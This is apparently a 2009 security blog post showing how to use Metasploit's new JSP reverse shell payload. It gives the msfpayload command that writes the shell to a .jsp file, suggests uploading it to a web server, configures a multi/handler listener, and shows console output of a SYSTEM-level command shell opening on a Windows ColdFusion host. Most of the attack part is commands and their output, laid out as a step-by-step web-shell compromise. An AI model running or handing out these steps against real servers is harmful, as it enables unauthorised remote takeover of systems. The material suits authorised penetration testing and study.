Metasploit JSP Shells
Stephen Fewer has pushed up a jsp reverse and jsp bind shell.http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/javaI'm not sure of all the ways to use them but the easiest way is to just output the shell to raw and just upload it to a web server or for an example with an exploit check out the adobe robohelp exploit.http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rbyomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > blah.jspFrom there you can set up your multi handler, browse to your page webpath/blah.jsp and grab your shell.yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole =[ msf v3.3-dev [core:3.3 api:1.0]+ -- --=[ 432 exploits - 261 payloads+ -- --=[ 21 encoders - 8 nops =[ 222 auxmsf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcpset PAYLOAD java/jsp_shell_reverse_tcp msf exploit(handler) > set LHOST 192.168.10.1LHOST => 192.168.10.1msf exploit(handler) > info Name: Generic Payload Handler Version: 6558 Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP Privileged: No License: Metasploit Framework License (BSD)Provided by: hdmAvailable targets:Id Name-- ----0 Wildcard TargetPayload information:Space: 100000Avoid: 0 charactersDescription:This module is a stub that provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework.msf exploit(handler) > show optionsModule options: Name Current Setting Required Description ---- --------------- -------- -----------Payload options (java/jsp_shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.10.1 yes The local address LPORT 4444 yes The local port SHELL cmd.exe yes The system shell to use.Exploit target: Id Name -- ---- 0 Wildcard Targetmsf exploit(handler) > exploit[*] Starting the payload handler...[*] Started reverse handler[*] Command shell session 1 opened ( 192.168.10.1:4444 -> 192.168.10.2:42957)Microsoft Windows [Version 5.2.3790](C) Copyright 1985-2003 Microsoft Corp.C:ColdFusion8runtimebin> whoamiwhoamint authoritysystemC:ColdFusion8runtimebin>exitexit[*] Command shell session 1 closed.

Stephen Fewer has pushed up a jsp reverse and jsp bind shell.

http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/java

I'm not sure of all the ways to use them but the easiest way is to just output the shell to raw and just upload it to a web server or for an example with an exploit check out the adobe robohelp exploit.

http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rb


yomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > blah.jsp

From there you can set up your multi handler, browse to your page webpath/blah.jsp and grab your shell.

yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole
=[ msf v3.3-dev [core:3.3 api:1.0]

+ -- --=[ 432 exploits - 261 payloads

+ -- --=[ 21 encoders - 8 nops

=[ 222 aux



msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp

set PAYLOAD java/jsp_shell_reverse_tcp

msf exploit(handler) > set LHOST 192.168.10.1

LHOST => 192.168.10.1

msf exploit(handler) > info


Name: Generic Payload Handler

Version: 6558

Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP

Privileged: No

License: Metasploit Framework License (BSD)


Provided by:
hdm

Available targets:

Id Name

-- ----

0 Wildcard Target


Payload information:

Space: 100000

Avoid: 0 characters



Description:

This module is a stub that provides all of the features of the

Metasploit payload system to exploits that have been launched

outside of the framework.


msf exploit(handler) > show options


Module options:


Name Current Setting Required Description

---- --------------- -------- -----------



Payload options (java/jsp_shell_reverse_tcp):


Name Current Setting Required Description

---- --------------- -------- -----------
LHOST 192.168.10.1 yes The local address
LPORT 4444 yes The local port
SHELL cmd.exe yes The system shell to use.


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > exploit

[*] Starting the payload handler...

[*] Started reverse handler

[*] Command shell session 1 opened ( 192.168.10.1:4444 -> 192.168.10.2:42957)

Microsoft Windows [Version 5.2.3790]

(C) Copyright 1985-2003 Microsoft Corp.


C:\ColdFusion8\runtime\bin>
whoami
whoami

nt authority\system


C:\ColdFusion8\runtime\bin>
exit
exit


[*] Command shell session 1 closed.



Read Full Article

GSO
Written on Thursday, 22 October 2009 08:55 by GSO

Viewed 142 times so far.
Like this? Tweet it to your followers!

Rate this article

Latest articles from GSO

Latest 'tweets' from GovernmentSecurity

blog comments powered by Disqus

 

Our Sponsors

Shoutcast Streams | Internet Radio HOSTINGLitespeed Web HostingIRC | IRCd | Internet Relay Chat HostingEarn Recurring Income

Member Login